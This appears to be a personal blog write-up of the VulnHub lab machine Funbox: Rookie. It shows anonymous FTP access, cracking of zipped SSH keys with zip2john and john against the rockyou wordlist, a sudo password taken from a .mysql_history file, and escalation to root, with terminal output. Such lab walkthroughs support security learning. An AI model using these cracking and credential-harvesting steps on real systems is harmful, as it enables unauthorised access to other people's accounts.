Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first

I went away again for a few days; this time with the family - so that was nice. Now it’s back to the boxes: Funbox: Rookie. This was easier than the last one.


We’ve got FTP, SSH and HTTP on Port 80.


If I get FTP on one of these boxes I always try anonymous login and it works here, we get 11 zip files and a couple of messages, two of which are hidden. One is base64 encoded but they’re basically identical - the zip files belong to users and contain password protected SSH keys.

We can convert these to a John friendly format and attack them with rockyou:

root@kali:/opt/vulnhub/funbox2# zip2john > miriam.john
ver 2.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6
root@kali:/opt/vulnhub/funbox2# john miriam.john -w=/usr/share/wordlists/rockyou.txt
Warning: UTF-8 seen reading miriam.john
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2020-10-06 08:53) 0g/s 7628Kp/s 7628Kc/s 7628KC/s !joley08!..SpeakPeople22!
Session completed

But, most of them don’t crack easily. Two of them do however; and we can try to SSH in as those users with their keys. One logs out again immediately; the other one (tom) works.

In the meantime I’ve been running enumeration on the webserver with gobuster mostly targeting the disallowed directory logs (from robots.txt) but this is drawing a blank; presumably this is the rabbit-hole the description refers to.


Once we SSH in as our user, we notice in his home directory a file called .mysql_history. We can cat this file, and it contains something that looks like a password in amongst the other stuff. Could it be? Yes - it’s his sudo password. The rest is very simple:

tom@funbox2:~$ sudo -l
[sudo] password for tom: 
Matching Defaults entries for tom on funbox2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
    (ALL : ALL) ALL
tom@funbox2:~$ sudo su
root@funbox2:/home/tom# cd /root
root@funbox2:~# pwd
root@funbox2:~# ls
root@funbox2:~# cat flag.txt 
from @0815R2d2 with ♥